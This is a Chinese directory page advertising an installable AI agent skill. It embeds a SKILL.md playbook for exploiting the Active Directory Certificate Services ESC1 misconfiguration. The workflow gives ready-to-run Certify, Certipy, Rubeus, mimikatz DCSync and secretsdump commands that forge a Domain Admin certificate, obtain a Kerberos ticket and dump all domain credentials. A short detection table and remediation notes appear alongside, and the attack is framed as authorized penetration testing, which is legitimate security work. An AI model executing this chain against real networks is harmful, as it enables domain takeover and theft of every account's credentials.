Token导航 LogoToken导航TokenDH.com
研究检索执行命令github未标认证来源可访问许可证需确认审计异常

exploiting-active-directory-certificate-services-esc1利用活动目录证书服务 esc1

Agent Skill

exploiting-active-directory-certificate-services-esc1 用于查找、检索和筛选相关信息,适合在 Codex、Claude、Cursor、Gemini CLI 中需要根据关键词、任务场景或来源线索快速定位候选结果时使用。可结合来源仓库、安装命令和原始 README 继续核验具体用法。安装前建议确认权限范围、维护状态,以及是否会触发联网、命令执行或文件读写。

总安装

667

周安装

27

GitHub Stars

5,873

下载量

210
CodexClaudeCursorGemini CLI

安装说明

本站只整理中文说明和来源信息,不托管安装包,也不代用户安装。

GitHub

来源数

2

许可证

unknown

最后核验

2026-05-01

来源状态

来源可访问

安装方式

通过对话安装

复制提示词发给支持本地命令或 Skills 的 AI 助手,先确认命令和权限,再让它执行。

请帮我安装这个 Agent Skill:exploiting-active-directory-certificate-services-esc1(利用活动目录证书服务 esc1)
来源仓库:https://github.com/mukul975/anthropic-cybersecurity-skills
仓库路径:skills/exploiting-active-directory-certificate-services-esc1
安装命令:
npx skills add https://github.com/mukul975/anthropic-cybersecurity-skills --skill exploiting-active-directory-certificate-services-esc1
安装前请先检查当前环境是否支持对应 CLI,并向我确认将要执行的命令、安装目录、联网范围和文件读写权限;确认后再执行。

命令行安装

复制命令到本机终端执行。该命令会通过 npx skills 从第三方来源获取 Skill;本站只展示命令,不托管安装包,也不自动执行。

skills.shnpx skills
npx skills add https://github.com/mukul975/anthropic-cybersecurity-skills --skill exploiting-active-directory-certificate-services-esc1

简介

用于查找、检索和筛选相关信息,支持基于关键词或场景的信息聚合。

  • 适合快速定位 AD CS ESC1 漏洞利用工具、证书模板配置指南或域提权案例。
  • 可按 Windows Server 版本或证书服务角色分类返回技术细节。
  • 安装命令:npx skills add https://github.com/mukul975/anthropic-cybersecurity-skills --skill exploiting-active-directory-certificate-services-esc1
  • 注意:仅限授权域环境测试,严禁用于非法获取域控制权。

SKILL.md

Exploiting Active Directory Certificate Services ESC1

Overview

ESC1 (Escalation Scenario 1) is a critical misconfiguration in Active Directory Certificate Services where a certificate template allows a low-privileged user to request a certificate on behalf of any other user, including Domain Admins. The vulnerability exists when a template has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag enabled (also called "Supply in Request"), combined with an Extended Key Usage (EKU) that permits client authentication (Client Authentication, PKINIT Client Authentication, Smart Card Logon, or Any Purpose). This allows an attacker to specify an arbitrary Subject Alternative Name (SAN) in the certificate request, effectively impersonating any domain user. ESC1 was documented by SpecterOps researchers Will Schroeder and Lee Christensen in their "Certified Pre-Owned" whitepaper (2021) and remains one of the most common AD CS attack paths. The MITRE ATT&CK framework tracks this as T1649 (Steal or Forge Authentication Certificates).

When to Use

  • When performing authorized security testing that involves exploiting active directory certificate services esc1
  • When analyzing malware samples or attack artifacts in a controlled environment
  • When conducting red team exercises or penetration testing engagements
  • When building detection capabilities based on offensive technique understanding

Prerequisites

  • Familiarity with red teaming concepts and tools
  • Access to a test or lab environment for safe execution
  • Python 3.8+ with required dependencies installed
  • Appropriate authorization for any testing activities

Objectives

  • Enumerate AD CS infrastructure and certificate templates using Certify or Certipy
  • Identify vulnerable ESC1 templates with "Supply in Request" enabled
  • Request a certificate specifying a Domain Admin in the SAN field
  • Authenticate using the forged certificate via PKINIT to obtain a TGT
  • Escalate privileges to Domain Admin using the obtained Kerberos ticket
  • Document the full attack chain for the engagement report

MITRE ATT&CK Mapping

  • T1649 - Steal or Forge Authentication Certificates
  • T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
  • T1078.002 - Valid Accounts: Domain Accounts
  • T1484 - Domain Policy Modification
  • T1087.002 - Account Discovery: Domain Account

Workflow

Phase 1: AD CS Enumeration

  1. Enumerate Certificate Authority (CA) servers in the domain: # Using Certify (Windows) Certify.exe cas # Using Certipy (Linux/Python) certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1
  2. Enumerate all certificate templates and identify vulnerable ones: # Using Certify - find vulnerable templates Certify.exe find /vulnerable # Using Certipy - outputs JSON and text reports certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1 -vulnerable
  3. Verify ESC1 conditions on identified templates:

- msPKI-Certificate-Name-Flag contains ENROLLEE_SUPPLIES_SUBJECT - pkiExtendedKeyUsage contains Client Authentication or Smart Card Logon - msPKI-Enrollment-Flag does not require manager approval - Low-privileged group (Domain Users, Authenticated Users) has Enroll rights

Phase 2: Certificate Request with Arbitrary SAN

  1. Request a certificate using the vulnerable template, specifying a Domain Admin in the SAN: # Using Certify (Windows) Certify.exe request /ca:DC01.domain.local\domain-CA /template:VulnerableTemplate /altname:administrator # Using Certipy (Linux) certipy req -u user@domain.local -p 'Password123' -ca 'domain-CA' -target DC01.domain.local -template VulnerableTemplate -upn administrator@domain.local
  2. The CA issues a certificate with the Domain Admin's UPN in the SAN field
  3. Save the output certificate in PFX/PEM format

Phase 3: Authentication with Forged Certificate

  1. Convert the certificate if needed (Certify outputs PEM, convert to PFX): openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
  2. Authenticate using PKINIT to obtain a TGT for the impersonated user: # Using Rubeus (Windows) Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:<pfx-password> /ptt # Using Certipy (Linux) certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
  3. The TGT is now loaded in memory (Windows) or the NT hash is recovered (Linux)

Phase 4: Domain Privilege Escalation

  1. With the Domain Admin TGT, perform privileged operations: # DCSync to dump all domain credentials mimikatz.exe "lsadump::dcsync /domain:domain.local /all" # Or using secretsdump.py with the obtained NT hash secretsdump.py domain.local/administrator@DC01.domain.local -hashes:ntlmhash
  2. Validate Domain Admin access: # List domain controllers dir \\DC01.domain.local\C$ # Access Domain Admin shares dir \\DC01.domain.local\SYSVOL

Tools and Resources

ToolPurposePlatform
CertifyAD CS enumeration and certificate requestsWindows (.NET)
CertipyAD CS enumeration, request, and authenticationLinux (Python)
RubeusKerberos authentication with certificates (PKINIT)Windows (.NET)
MimikatzCredential dumping post-escalationWindows
secretsdump.pyRemote credential dumping (Impacket)Linux (Python)
PSPKIAuditPowerShell AD CS auditing moduleWindows
ForgeCertCertificate forgery toolWindows (.NET)

Vulnerable Template Indicators

ConditionVulnerable Value
msPKI-Certificate-Name-FlagENROLLEE_SUPPLIES_SUBJECT (1)
pkiExtendedKeyUsageClient Authentication (1.3.6.1.5.5.7.3.2)
Enrollment RightsDomain Users or Authenticated Users
msPKI-Enrollment-FlagNo manager approval required
CA SettingNo approval workflow enforced

Detection Signatures

IndicatorDetection Method
Certificate request with SAN different from requesterWindows Event 4886 / 4887 on CA server
Unusual PKINIT authenticationEvent 4768 with certificate-based pre-auth
Certify.exe or Certipy executionEDR process monitoring and command-line logging
Mass certificate template enumerationLDAP query monitoring for pkiCertificateTemplate objects
Certificate issued to non-matching UPNCA audit logs and certificate transparency

Validation Criteria

  • AD CS Certificate Authority enumerated
  • Vulnerable ESC1 templates identified with Certify or Certipy
  • Certificate requested with Domain Admin SAN successfully
  • PKINIT authentication performed with forged certificate
  • Domain Admin TGT obtained
  • Privileged access to domain controller validated
  • Full attack chain documented with evidence
  • Remediation recommendations provided (disable Supply in Request, require manager approval)

适合场景

01

用户想查找某类 Agent Skill 时

02

需要根据任务场景推荐可安装能力包时

03

需要对比不同来源的安装命令和来源信息时

能力概览

能力 1

按任务关键词查找相关 Skills

能力 2

展示可复制的安装命令

能力 3

保留来源站点、仓库和原始说明,方便继续核验

能力 4

展示第三方安全扫描或审计结果

安装后应在对应宿主中按原始 README 的触发条件使用;具体调用方式请以来源页面和 README 为准。

平台分布

Codex

34.45%
按下载量换算72

Claude

32.95%
按下载量换算69

Cursor

18.84%
按下载量换算40

Gemini CLI

9.65%
按下载量换算20

安全审计

Gen Agent Trust Hub

通过

Socket

未通过

Snyk

未通过

权限和风险

执行命令

安装流程涉及命令执行,可能通过 npx skills add https://github.com/mukul975/anthropic-cybersecurity-skills --skill exploiting-active-directory-certificate-services-esc1 联网下载 Skill 或依赖。用户安装前应确认命令来源、仓库内容和执行环境。

安装前确认

本站仅展示第三方公开信息,不托管安装包,不提供自动安装或运行环境。安装前应自行审查源码、依赖和命令行为。来源安全扫描存在 warning/failed 结果,不能写成本站确认安全。当前只有一个来源,正式发布前建议补源仓库或其他目录站核验。

来源信息

继续浏览同类 Skills